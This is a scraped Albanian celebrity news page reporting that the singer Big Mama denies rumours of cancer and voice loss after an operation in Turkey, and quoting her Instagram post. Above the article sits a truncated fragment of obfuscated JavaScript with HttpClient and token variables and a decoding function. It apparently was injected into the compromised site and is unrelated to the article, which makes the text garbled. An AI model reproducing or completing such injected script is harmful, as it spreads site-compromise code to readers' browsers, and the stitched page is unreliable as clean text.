;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Kancer dhe humbje e zërit’: Big Mama flet mbi shtrimin në spital

By

Këngëtarja njëherësh prezantuesja Big Mama tash e disa ditë po poston fotografi nga Turqia në prani të një stafi mjekësor.

Duke mos specifikuar arsyet e shtrimit në spital, këngëtarja ka bërë që të shkaktohen dhjetëra thashetheme.

Në qarqe të ndryshme, gjërat shkuan aq larg sa u përmend kanceri dhe humbja e zërit.

Por, në këtë nuk ka asgjë të vërtetë dhe këtë e ka treguar vëtë Bigu në një postim në rrjetin social Instagram.

E lodhur nga ky nivel i ulët i spekulimeve, ajo ka deklaruar se përgjigja e plotë do merret në emisionin e saj, meqenëse gjithë procedurën ajo e ka filmuar për emisionin që drejton shkruan Prive.al

Më poshtë postimi i plotë i saj:

Miq,
Fillimisht ju falenderoj shumë të gjithëve që jeni interesuar dhe shkruar për mua e gjendjen time, kam lexuar shkrime të ndryshme e kam dëgjuar muhabete rreth shëndetit tim por nuk kam mundur që të ju përgjigjem të gjithëve, andaj vendosa që përmes këtij mesazhi të ju them të gjithëve miqëve dhe dashamirëve por edhe atyre që shpifin e shpikin, unë jam shumë mirë me shëndet, e vërtetë që kam realizuar një operacion në Turqi për një jetë më të shëndetshme mirëpo nuk kam pasur as kancer e as nuk e kam humbur vokalin e nuk jam në gjendje kritike, por jam shëndosh si molla. Ndërkohë që ju lus të prisni deri të dielën për të gjitha detajet rreth operacionit tek emisioni im “Mama’s trip” ne ora 15.00 tv21 aty i keni te gjitha te vertetat .

Mpuq

Artikuj të ngjashëm